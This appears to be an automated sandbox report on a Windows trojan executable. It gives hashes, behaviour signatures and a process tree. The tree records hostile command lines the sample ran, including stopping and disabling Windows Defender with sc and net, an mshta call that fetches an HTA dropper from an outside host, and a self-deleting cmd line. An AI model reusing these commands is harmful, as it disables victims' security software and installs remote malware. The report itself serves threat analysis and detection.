Overview

overview

10

Static

static

900ffca233...7f.exe

windows7-x64

10

900ffca233...7f.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    156s
  • max time network
    177s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-12-2022 12:39

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe

  • Size

    2.2MB

  • MD5

    44e75fcf7bffbb2d15574bd78abb663b

  • SHA1

    43be4f349f05f5ba056961ee8bdc9e4e8c443a10

  • SHA256

    900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f

  • SHA512

    c6aaaec41b7b84586a43a2fde49641de06aafa1d1d5d0f1000dcc69b518e7a2920165c708da3048abd889513ff8c23c187bfd9cf5d12ae4a98932333be43a961

  • SSDEEP

    49152:Tb+qOGFGc/y+BMsAuII26f0EQh6fVnOTk3DSpX4R9DKp52:Tb2ou+mZpI268EQsx3D2XNpw

Score
10/10
evasionpersistencetrojan

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://softscoreinc.com/soft-usage/favicon.ico?0=1200&1=SOCAAGDT&2=i-s&3=135&4=9200&5=6&6=2&7=919041&8=1033

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • UAC bypass 3 TTPs 3 IoCs
    evasiontrojan
  • Executes dropped EXE 1 IoCs
  • Sets file execution options in registry 2 TTPs 16 IoCs
    persistence
  • Stops running service(s) 3 TTPs
    evasion
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Launches sc.exe 6 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs
  • System policy modification 1 TTPs 4 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe
    "C:\Users\Admin\AppData\Local\Temp\900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:5004
    • C:\Windows\SysWOW64\sc.exe
      sc stop WinDefend
      2⤵
      • Launches sc.exe
      PID:648
    • C:\Windows\SysWOW64\sc.exe
      sc config WinDefend start= disabled
      2⤵
      • Launches sc.exe
      PID:3488
    • C:\Windows\SysWOW64\sc.exe
      sc config msmpsvc start= disabled
      2⤵
      • Launches sc.exe
      PID:1036
    • C:\Windows\SysWOW64\net.exe
      net stop msmpsvc
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1372
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop msmpsvc
        3⤵
          PID:3280
      • C:\Users\Admin\AppData\Roaming\Microsoft\yqfoks.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\yqfoks.exe
        2⤵
        • Modifies WinLogon for persistence
        • UAC bypass
        • Executes dropped EXE
        • Sets file execution options in registry
        • Checks whether UAC is enabled
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        • System policy modification
        PID:316
        • C:\Windows\SysWOW64\sc.exe
          sc stop WinDefend
          3⤵
          • Launches sc.exe
          PID:2840
        • C:\Windows\SysWOW64\sc.exe
          sc config WinDefend start= disabled
          3⤵
          • Launches sc.exe
          PID:3236
        • C:\Windows\SysWOW64\net.exe
          net stop msmpsvc
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3848
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop msmpsvc
            4⤵
              PID:2360
          • C:\Windows\SysWOW64\sc.exe
            sc config msmpsvc start= disabled
            3⤵
            • Launches sc.exe
            PID:1248
          • C:\Windows\SysWOW64\mshta.exe
            mshta.exe "http://softscoreinc.com/soft-usage/favicon.ico?0=1200&1=SOCAAGDT&2=i-s&3=135&4=9200&5=6&6=2&7=919041&8=1033"
            3⤵
              PID:1188
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\900FFC~1.EXE" >> NUL
            2⤵
              PID:3968

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Roaming\Microsoft\yqfoks.exe
            Filesize

            2.2MB

            MD5

            44e75fcf7bffbb2d15574bd78abb663b

            SHA1

            43be4f349f05f5ba056961ee8bdc9e4e8c443a10

            SHA256

            900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f

            SHA512

            c6aaaec41b7b84586a43a2fde49641de06aafa1d1d5d0f1000dcc69b518e7a2920165c708da3048abd889513ff8c23c187bfd9cf5d12ae4a98932333be43a961

            Download Submit

          • C:\Users\Admin\AppData\Roaming\Microsoft\yqfoks.exe
            Filesize

            2.2MB

            MD5

            44e75fcf7bffbb2d15574bd78abb663b

            SHA1

            43be4f349f05f5ba056961ee8bdc9e4e8c443a10

            SHA256

            900ffca233b325920f0e76a8b7ae74d37a434ab315088a5d763b66bec2abc77f

            SHA512

            c6aaaec41b7b84586a43a2fde49641de06aafa1d1d5d0f1000dcc69b518e7a2920165c708da3048abd889513ff8c23c187bfd9cf5d12ae4a98932333be43a961

            Download Submit

          • memory/316-144-0x0000000000400000-0x000000000082E000-memory.dmp

            Filesize

            4.2MB

            Download

          • memory/316-150-0x0000000000D80000-0x0000000000DDA000-memory.dmp

            Filesize

            360KB

            Download

          • memory/316-149-0x0000000000400000-0x000000000082E000-memory.dmp

            Filesize

            4.2MB

            Download

          • memory/316-145-0x0000000000D80000-0x0000000000DDA000-memory.dmp

            Filesize

            360KB

            Download

          • memory/5004-137-0x0000000002620000-0x000000000267A000-memory.dmp

            Filesize

            360KB

            Download

          • memory/5004-136-0x0000000000400000-0x000000000082E000-memory.dmp

            Filesize

            4.2MB

            Download

          • memory/5004-152-0x0000000000400000-0x000000000082E000-memory.dmp

            Filesize

            4.2MB

            Download

          • memory/5004-153-0x0000000002620000-0x000000000267A000-memory.dmp

            Filesize

            360KB

            Download